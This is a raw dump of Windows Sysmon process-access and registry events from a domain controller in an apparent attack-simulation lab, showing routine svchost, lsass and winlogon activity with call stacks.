13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 